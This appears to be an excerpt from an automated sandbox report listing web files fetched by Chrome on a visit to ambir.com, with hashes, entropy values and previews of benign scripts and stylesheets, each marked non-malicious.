                                                                                                                                                                                              MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                                                                                                              SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                                                                                                              SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                                                                                                              SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.PNG........IHDR..............0|T..F.IDATx..[l\G..Gq[.j..-.......Q.b....:.=.K.6@#KP..U.!(B&!..i......j.B.$>g...%.(.u..H.T.....P5q..gw......H.b;.b.....f...d.....3C.....B..W.Y..o....c..>k..M$x..L....x"...@..>..N.\..}o>'...Z.=.bd.[c..g.w.9~......!....<E......!....QCd...#_..w.....r7.>...U*..?....u...[G.....wG4....+....X...-.R>.,z:.X.X....c.B%60u).._...g.:......._.[...N...t-.)S.J.g<...:.3.Dv.........T..z.#..y_PL......~.nv.k...Z.#...G..^.D..k...jS..m....Ti.J......*..e _..j.,3j..."..4....#.!sSZ@....RS.K..1.~..d.t.Ra.........T7....L..RK4].....h....\...L./....Q...o.Y-...9.EF.].;!.NS.9.e3..!.2....U..T.'.....%c..IC2.....W.S...v?...MP.{[..7&...t.....p.........V.NF5..J....+5=n%..?T..$.....GK...&..-....3:'(.........}...-...zv2...m.T..V.R.d.Z.......a~.G.xz....M..KT...P....7......X..h<}.d..`.NU;>}|^0k#"S1..^.i..3L.r.9|Os.......S..>V.;.xy4..d...*.Z.|f.pKL.....:.........=.~....;z..n...M.D1.OMC2.L..Sc..f..G.Y..L.&..h&.hX.}m..XW....P.zU..&.....d ..+.i.h.u&B......r....
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (62388), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):437268
                                                                                                                                                                                              Entropy (8bit):5.608887245430585
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:aD+St1FS1XbGBa95Wlm8R9JX3yxEmoJPyB5fOmRYYMrmgmETVFzrpQqr3K9zwrc3:aD+St61LGBk5um8Rz3dcBNrj
                                                                                                                                                                                              MD5:E854A58FE58B0FCB7247838D0647CD37
                                                                                                                                                                                              SHA1:C09DD529E8055665A96B7E073713EE77607216DA
                                                                                                                                                                                              SHA-256:FB51BA4028CA8426B72C2363984EB0553CB0864A61681EA082C6AE9B739D8530
                                                                                                                                                                                              SHA-512:EB4F1D4EB2D899F95913A86D7CD6E54E0420856B12258ABE69D1440CB5C2E49C35A7A5393DBDD8EF8C7BD683F099898E63F30B87F99EE11BF078E96B32659346
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:!function({retentionPeriodDays:e,timestamp:t,daysBeforeNotice:i,productName:n,version:s,ignorePattern:a}){if(a.some((e=>RegExp(e).test(document.currentScript.src))))return;const o=(-1*(Date.now()-t-24*e*60*60*1e3)/864e5).toFixed(2);o<=i&&o>=0?console.warn(`Warning: The version ${s} of ${n} is set to lose support in ${o} days.`):o<0&&console.error(`Error: The version ${s} of ${n} not supported anymore.`)}({retentionPeriodDays:90,productName:"accessWidget",daysBeforeNotice:14,version:"v1.19.0",timestamp:1732031714890,ignorePattern:["/^(?!.*v\\d+\\.\\d+\\.\\d+).*/"]}),(()=>{"use strict";var e={301:function(e,t,i){var n=this&&this.__values||function(e){var t="function"==typeof Symbol&&Symbol.iterator,i=t&&e[t],n=0;if(i)return i.call(e);if(e&&"number"==typeof e.length)return{next:function(){return e&&n>=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")},s=this&&this.__read||function(e,t){var i="function"==type
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:V:V
                                                                                                                                                                                              MD5:E0AA021E21DDDBD6D8CECEC71E9CF564
                                                                                                                                                                                              SHA1:9CE3BD4224C8C1780DB56B4125ECF3F24BF748B7
                                                                                                                                                                                              SHA-256:565339BC4D33D72817B583024112EB7F5CDF3E5EEF0252D6EC1B9C9A94E12BB3
                                                                                                                                                                                              SHA-512:900110C951560EFF857B440E89CC29F529416E0E3B3D7F0AD51651BFDBD8025B91768C5ED7DB5352D1A5523354CE06CED2C42047E33A3E958A1BBA5F742DB874
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:OK
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (1320)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1360
                                                                                                                                                                                              Entropy (8bit):5.131237769754918
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:B+9VqsRthp0Mejm4s1RWe2LSaaq1aa5/DM/RR2ns4t8oYRFOobvuh0usUiEFyB/6:B+9bLToj4we2L9DM/RQnv8oYjOobG53l
                                                                                                                                                                                              MD5:BE30DFD7230F4DE4D17D5F3B90388327
                                                                                                                                                                                              SHA1:00A95A12C3385622AD1B8B2E42726140C3BEEF9F
                                                                                                                                                                                              SHA-256:1DA6D01EB753E4A4A38C6C3B1B6E985264774FB3BB436EB7CF1C928213525469
                                                                                                                                                                                              SHA-512:41098F35DE2D73B7DA2521D3CB8AED11022BDB07BFF04556AEAD532A9DCC6BE1C23F7A5AD9E703DAA9497F8B5BDBAC440016149F3C54D457A54555EB631C6AEE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:/*! elementor - v3.25.0 - 19-11-2024 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[357],{1327:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class TextEditor extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{paragraph:"p:first"},classes:{dropCap:"elementor-drop-cap",dropCapLetter:"elementor-drop-cap-letter"}}}getDefaultElements(){const e=this.getSettings("selectors"),t=this.getSettings("classes"),r=jQuery("<span>",{class:t.dropCap}),p=jQuery("<span>",{class:t.dropCapLetter});return r.append(p),{$paragraph:this.$element.find(e.paragraph),$dropCap:r,$dropCapLetter:p}}wrapDropCap(){if(!this.getElementSettings("drop_cap"))return void(this.dropCapLetter&&(this.elements.$dropCap.remove(),this.elements.$paragraph.prepend(this.dropCapLetter),this.dropCapLetter=""));const e=this.elements.$paragraph;if(!e.length)return;const t=e.html().replace(/&nbsp;/g," "),r=t.match(/^ *([^ ] ?)/);if(!r)return;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (8997), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):8997
                                                                                                                                                                                              Entropy (8bit):5.202507991071995
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:k/UWUp6D4uggCfc0AdxOAx94EaK/gVHwA0tiUR1PRXonoka8aX3:k/UtVTfbGbF/gVQAojX7X3
                                                                                                                                                                                              MD5:9144AAFB03F624B2D2180DA5B9DD0BC8
                                                                                                                                                                                              SHA1:EF8AF033DD0BF16D0D872364ADC9C0C8D3CA6014
                                                                                                                                                                                              SHA-256:B0ABEC2D9709FD039609B9A3A8108866D0F35875C0FCEF8D1DA49C586E644657
                                                                                                                                                                                              SHA-512:7A70BF7B356AF36355AB69B32D16010D9B1583C20358C5C00E2AACEF85D6915C794EF01574D7C5C2C9E9BD950743E5FCE14077D6D66F85F48203C0EAAD8B64E2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient/loader.js
                                                                                                                                                                                              Preview:!function t(e,n,o){function r(a,s){if(!n[a]){if(!e[a]){var l="function"==typeof require&&require;if(!s&&l)return l(a,!0);if(i)return i(a,!0);var u=new Error("Cannot find module '"+a+"'");throw u.code="MODULE_NOT_FOUND",u}var c=n[a]={exports:{}};e[a][0].call(c.exports,function(t){var n=e[a][1][t];return r(n?n:t)},c,c.exports,t,e,n,o)}return n[a].exports}for(var i="function"==typeof require&&require,a=0;a<o.length;a++)r(o[a]);return r}({1:[function(t,e,n){(function(t){var n,o,r;r=function(t){var e;try{return t.location.origin||(e=t.location.port,t.location.origin=t.location.protocol+"//"+t.location.hostname+(null!=e?e:":"+e||"")),(null==t||!t.location.origin.match(/static\.olark\.com$/))&&(null!=t&&t.parent.document,!0)}catch(t){return!1}},o=(n=function(e){if(e=e||t.window)return r(e)&&e!==t.window.top?(null!=e?e.parent.olark:void 0)?e.parent:n(e.parent):e})(),e.exports={getOlark:function(){return null!=o?o.olark:void 0},getWindow:function(){return o},getDocument:function(){return null!=
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (32010)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1190123
                                                                                                                                                                                              Entropy (8bit):5.491431189755651
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:IkRJXt12JbrJSjFpxd5Q04o+R2om76yHA2oiLKOBz0SR:I2JXt12JbrQjFpxHQbrD4MiLBz0SR
                                                                                                                                                                                              MD5:713BD4A23A0C3D6063B357D9D50E440C
                                                                                                                                                                                              SHA1:B25695CC2EABD2BD15A8AA521CE5C3ED4F777B07
                                                                                                                                                                                              SHA-256:46CC6ABE12720C78BA6F8F936D8ED5A70011625488B10967A5575A19E5263756
                                                                                                                                                                                              SHA-512:E17C2C865784EC23BA52A12A8AE715F3341A3C17A39ED58464286EC2AC2B5512E1DBE23C5667350DFAC39E25A25DFBC9B350E7ED629B74DD48367D3C53BB6BE2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.olark.com/jsclient-bucket5/application2.js?v=1732053196593
                                                                                                                                                                                              Preview:!function e(t,n,r){function o(a,s){if(!n[a]){if(!t[a]){var l="function"==typeof require&&require;if(!s&&l)return l(a,!0);if(i)return i(a,!0);var c=new Error("Cannot find module '"+a+"'");throw c.code="MODULE_NOT_FOUND",c}var u=n[a]={exports:{}};t[a][0].call(u.exports,function(e){var n=t[a][1][e];return o(n?n:e)},u,u.exports,e,t,n,r)}return n[a].exports}for(var i="function"==typeof require&&require,a=0;a<r.length;a++)o(r[a]);return o}({1:[function(e,t,n){"use strict";function r(){if(l.length)throw l.shift()}function o(e){var t;(t=s.length?s.pop():new i).task=e,a(t)}function i(){this.task=null}var a=e("./raw"),s=[],l=[],c=a.makeRequestCallFromTimer(r);t.exports=o,i.prototype.call=function(){try{this.task.call()}catch(e){o.onerror?o.onerror(e):(l.push(e),c())}finally{this.task=null,s[s.length]=this}}},{"./raw":2}],2:[function(e,t,n){(function(e){"use strict";function n(e){s.length||(a(),l=!0),s[s.length]=e}function r(){for(;c<s.length;){var e=c;if(c+=1,s[e].call(),c>u){for(var t=0,n=s.len
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (1684)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):120231
                                                                                                                                                                                              Entropy (8bit):5.422390449516513
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:/T9qgh56NKQwDlR6OZCpcVJpHCsG3uX07/5A8R04bjVuRqn:EghDksG3XZ8M
                                                                                                                                                                                              MD5:A60CC99F2FA7D8BE630927AB20FC597F
                                                                                                                                                                                              SHA1:1423F5E756367F2D40BCAE4AEACBDCA0DF6CE079
                                                                                                                                                                                              SHA-256:CCFCC28AE46F176A4CFA561946DF21FF853F7CEABE5A49B022F71BC26FAF6B3E
                                                                                                                                                                                              SHA-512:282340CF4F5C6207F43D223FC385387E2AD1D30E198C28939E79E13BCAC6597B96405A64C586BBEA8A8A2B3F2B35361D6821D41560B4DD0237041C411DE8E205
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:try {. . __adroll.load_adroll_tpc(__adroll.render_advertisable_cell);.}.catch(e) {}..try {. function __adroll__(){this.pxlstart=(new Date).getTime();this.version="2.0";this.exp=8760;this.eexp=720;this.pv=1E11*Math.random();this.__adc="__ar_v4";this._loaded=this._broken=!1;this._url=2E3;this._kwl=300;this._r={};this._logs=[];this.cm_urls=[];this.consent_networks={facebook:"f",linkedin:"linkedin"};this.pixelstart=this.session_time=0;this._init_idb();this._init_floc_trial();for(var a=Array(4),b=0;b<a.length;b++)a[b]=(Math.round(1E11*Math.random()).toString(16)+Array(9).join("0")).substr(0,.8);this._set_global("adroll_sid",a.join(""));this._set_webworker_vars();this._has_global("adroll_adv_id")&&(this.init_pixchk(),this.trigger_gtm_consent_event(),this.load_pixel_assistant(),["adroll_adv_id","adroll_pix_id"].forEach(function(a){window.hasOwnProperty(a)&&("string"===typeof window[a]||window[a]instanceof String)&&(window[a]=window[a].replace(/[^A-Z0-9_]/g,""))}));a="ABCDEFG".spl
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (56478)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):56581
                                                                                                                                                                                              Entropy (8bit):5.291389530851364
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:11fYB36JjrwtQrAwNGNQ6CSoqajToW4nvwcchh9LNz5bRJ:1rjrwtQrAlNqoW8qhbbr
                                                                                                                                                                                              MD5:5E2CEAF5A8BCFBE8DCA084DAA1C6345E
                                                                                                                                                                                              SHA1:28C3A6BD7751C23485B129E03AE6A9377DFEB18F
                                                                                                                                                                                              SHA-256:4E9BF3536850F295BF7B85DE3375DE6859F3896700E19D67C1E827FB7DB34C61
                                                                                                                                                                                              SHA-512:0D71776BE74C1D75F637452094DBC1FE43400F5F7D481F896EE15C9207C23FC506F01B7A3B8C721B897F9C1FDBC3B065E034AE790158BED9612562BAE4E52193
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/js/formslive.a18412a662b0ec06aad976efc699e409.js
                                                                                                                                                                                              Preview:// $Id: $./**. * IMPORTANT NOTE: This compressed js file includes Zoho Forms Forms/Report live js.. */.function ZFLiveFormFocusHanderOnNavigation(actionType,pageNo){this.actionType=actionType,this.pageNo=pageNo}function ZFLiveFieldFocusHander(fieldElem,forError){this.fieldElem=fieldElem,this.isDisabledField=$(fieldElem).hasClass("fieldDisabled"),this.isFocusForError=void 0!==forError&&forError}function setFocusForElementThatCannotBeFocused(focusElem,callBackOnFocus,callBackFunctionParam){if(isSfChild(focusElem)){var scrollToViewElem=$(focusElem);if("livefield-elem"!=$(focusElem).attr("elname")){var closestFieldElem=$(focusElem).closest('[elname="livefield-elem"]');$(closestFieldElem).length>0&&(scrollToViewElem=closestFieldElem)}$(scrollToViewElem)[0].scrollIntoView({behavior:"auto",block:"center"})}if(isEmbeddedForm()&&(isMobileBrowser()||isSafari()))setTimeout(function(){var hiddenInput=$("<input />");$(hiddenInput).attr("type","text"),$(hiddenInput).attr("style","position: absolute;
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):307
                                                                                                                                                                                              Entropy (8bit):5.382123945558995
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:y+ruXDlEqja7L+LRB2DOexWb2RhQJFtXXC3AkIhhIl/1cK2fvFive:ylJja3aRB2DOexWb2RKJFtHeQh41cJvd
                                                                                                                                                                                              MD5:6DBD005457BE429D6A91D0E48E597F70
                                                                                                                                                                                              SHA1:E8C650B2ABBDCEDDB878858FE5D39DA0E207DEA4
                                                                                                                                                                                              SHA-256:01DEFFB4F9505EAC22FE9B6A2226AE56411B2232FF8496AA9BA690D3F1538F44
                                                                                                                                                                                              SHA-512:DD63402AEEF4A6E6D2F92632FC15A7136A302C6BFC01E7160399DE1BCBBDE4462E5EB94CCD418447EDFC1DDBE1D8D056EA4CE9D8B010B45A6E981860A19FA167
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://www.cloudflare.com/cdn-cgi/trace
                                                                                                                                                                                              Preview:fl=11f683.h=www.cloudflare.com.ip=8.46.123.75.ts=1732134503.483.visit_scheme=https.uag=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36.colo=EWR.sliver=none.http=http/1.1.loc=US.tls=TLSv1.3.sni=plaintext.warp=off.gateway=off.rbi=off.kex=X25519.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (4793), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):4793
                                                                                                                                                                                              Entropy (8bit):5.80300801990736
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:1gv6vV0qSkxO9D06lUUTz9NnSzZhFt8vf1dtzlTadRWU38Q:1dCqSF9Q6RX9hq0z0RR38Q
                                                                                                                                                                                              MD5:5200F136C36C6377FE8585FB8F3EDF95
                                                                                                                                                                                              SHA1:1889D5F2195F5FFC1733CF5CCCBD26537189451B
                                                                                                                                                                                              SHA-256:84B6AEE75F3C499343704B0A6538B8CBCBF7A000E930B631689A5CD8BDB7B8A8
                                                                                                                                                                                              SHA-512:1365C5A38BA4926F1E405D49399B359B3378F1A5255D353F0721E15199E6B7D64D6B4BB8E4F45B8B5F7BE711A7E377632CBC41DD03C0636E339B881C163A9C83
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1070729751/?random=1732134510409&cv=11&fst=1732134510409&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4
                                                                                                                                                                                              Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&globalThis,b,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var a=0;a<b.length;++a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==void 0?c:b[a]}} function v(b,a,c){if(a)a:{var d=b.split(".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+b+"$"+d),h(g,t[d],{co
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (2800), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):2800
                                                                                                                                                                                              Entropy (8bit):5.0813675050871066
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:iidCVcewy5PEtkDD5ZUDuEtSzWmGGYWmc:iiMmTgsaDD5ZUiEtSSmvmc
                                                                                                                                                                                              MD5:27F0F165135C7F2E26C94CB7A5AC5533
                                                                                                                                                                                              SHA1:80113AE1656A9E37E2DB0EAC20D97D111B179DB9
                                                                                                                                                                                              SHA-256:5595963BCA2AF38BC8E44B3447F2FBE26D3D552B151E0D2CBA04530609CF6676
                                                                                                                                                                                              SHA-512:DFD71411ED34C27967B832C1BC8E2B5436F360E5DD2E2028FC25428D199558643F6AB5DEA98A02F0CD468F52B751E5F866DAECBE78CAA8E18BABA8463580E02D
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/css/lightbox.min.css
                                                                                                                                                                                              Preview:.lb-loader,.lightbox{text-align:center;line-height:0}body:after{content:url(../images/close.png) url(../images/loading.gif) url(../images/prev.png) url(../images/next.png);display:none}.lb-dataContainer:after,.lb-outerContainer:after{content:"";clear:both}body.lb-disable-scrolling{overflow:hidden}.lightboxOverlay{position:absolute;top:0;left:0;z-index:9999;background-color:#000;filter:alpha(Opacity=80);opacity:.8;display:none}.lightbox{position:absolute;left:0;width:100%;z-index:10000;font-weight:400}.lightbox .lb-image{display:block;height:auto;max-width:inherit;border-radius:3px}.lightbox a img{border:none}.lb-outerContainer{position:relative;background-color:#fff;width:250px;height:250px;margin:0 auto;border-radius:4px}.lb-loader,.lb-nav{position:absolute;left:0}.lb-outerContainer:after{display:table}.lb-container{padding:4px}.lb-loader{top:43%;height:25%;width:100%}.lb-cancel{display:block;width:32px;height:32px;margin:0 auto;background:url(../images/loading.gif) no-repeat}.lb-nav{
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65440)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):78475
                                                                                                                                                                                              Entropy (8bit):5.050086845440776
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:OFm0aT/imfQEFLzBN78x3+dGSn1ePjVWLQHq/ioLbJ0oI1RblVGn3GT/b9u8zfm5:CEFLzBN78x3+dGsQHq/ioRgblVGnO0ae
                                                                                                                                                                                              MD5:2755260429CD02C98112DAC6F4B5B8CE
                                                                                                                                                                                              SHA1:C0FDD6EC5E0C9F2B85D42E517C375F07BEC5BC2D
                                                                                                                                                                                              SHA-256:B2CEA84C60142EA60E4A2CE7FFC440387184266D0133F3141E5142EE4C160F8D
                                                                                                                                                                                              SHA-512:408F6EC5EF7D0F15EF71DCB2606B07F033450977C27FDD337754C4A62EC8CA5A095C5C5654A710D87AD31978BDD776C3FA9A02B7B956A292E19A85065C005B67
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/css/formsthirdparty.2755260429cd02c98112dac6f4b5b8ce.css
                                                                                                                                                                                              Preview:/* $Id$ */./**. * IMPORTANT NOTE: This compressed css file includes thirdparty stylesheets. */../* * CSS Styles that are needed by jScrollPane for it to operate correctly. * * Include this stylesheet in your site or copy and paste the styles below into your stylesheet - jScrollPane * may not operate correctly without them. */.jspContainer{.overflow: hidden;.position: relative;}.jspPane{.position: absolute;}.jspVerticalBar{.position: absolute;.top: 0;.right: 0;.width: 16px;.height: 100%;.background: red;}.jspHorizontalBar{.position: absolute;.bottom: 0;.left: 0;.width: 100%;.height: 16px;.background: red;}.jspVerticalBar *,.jspHorizontalBar *{.margin: 0;.padding: 0;}.jspCap{.display: none;}.jspHorizontalBar .jspCap{.float: left;}.jspTrack{.background: #dde;.position: relative;}.jspDrag{.background: #bbd;.position: relative;.top: 0;.left: 0;.cursor: pointer;}.jspHorizontalBar .jspTrack,.jspHorizontalBar .jspDrag{.float: left;.height: 100%;}.jspArrow{.background: #50506d;.text-indent: -20
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (1684)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):120231
                                                                                                                                                                                              Entropy (8bit):5.422390449516513
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:/T9qgh56NKQwDlR6OZCpcVJpHCsG3uX07/5A8R04bjVuRqn:EghDksG3XZ8M
                                                                                                                                                                                              MD5:A60CC99F2FA7D8BE630927AB20FC597F
                                                                                                                                                                                              SHA1:1423F5E756367F2D40BCAE4AEACBDCA0DF6CE079
                                                                                                                                                                                              SHA-256:CCFCC28AE46F176A4CFA561946DF21FF853F7CEABE5A49B022F71BC26FAF6B3E
                                                                                                                                                                                              SHA-512:282340CF4F5C6207F43D223FC385387E2AD1D30E198C28939E79E13BCAC6597B96405A64C586BBEA8A8A2B3F2B35361D6821D41560B4DD0237041C411DE8E205
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://s.adroll.com/j/GXXT3DJJNNBKHGBC62RAND/roundtrip.js
                                                                                                                                                                                              Preview:try {. . __adroll.load_adroll_tpc(__adroll.render_advertisable_cell);.}.catch(e) {}..try {. function __adroll__(){this.pxlstart=(new Date).getTime();this.version="2.0";this.exp=8760;this.eexp=720;this.pv=1E11*Math.random();this.__adc="__ar_v4";this._loaded=this._broken=!1;this._url=2E3;this._kwl=300;this._r={};this._logs=[];this.cm_urls=[];this.consent_networks={facebook:"f",linkedin:"linkedin"};this.pixelstart=this.session_time=0;this._init_idb();this._init_floc_trial();for(var a=Array(4),b=0;b<a.length;b++)a[b]=(Math.round(1E11*Math.random()).toString(16)+Array(9).join("0")).substr(0,.8);this._set_global("adroll_sid",a.join(""));this._set_webworker_vars();this._has_global("adroll_adv_id")&&(this.init_pixchk(),this.trigger_gtm_consent_event(),this.load_pixel_assistant(),["adroll_adv_id","adroll_pix_id"].forEach(function(a){window.hasOwnProperty(a)&&("string"===typeof window[a]||window[a]instanceof String)&&(window[a]=window[a].replace(/[^A-Z0-9_]/g,""))}));a="ABCDEFG".spl
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (33229)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):33407
                                                                                                                                                                                              Entropy (8bit):4.7584710387647835
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:Wb+rB31zxcjzc61CrDam31bvG91QCQ/HUMNYmB1vcv/PEsQ/4j:731zxcfc6IyUFv61dQ/0MOm3izQ/Y
                                                                                                                                                                                              MD5:E35D9C4EBAEA0573DF8E4A9505B72EEA
                                                                                                                                                                                              SHA1:5FBB384CD8CD7A64483E6487D8D8179A633F9954
                                                                                                                                                                                              SHA-256:9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
                                                                                                                                                                                              SHA-512:C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                                                                                                                                                                              Preview:/*!. * Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (32019)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):89367
                                                                                                                                                                                              Entropy (8bit):5.3114345612848854
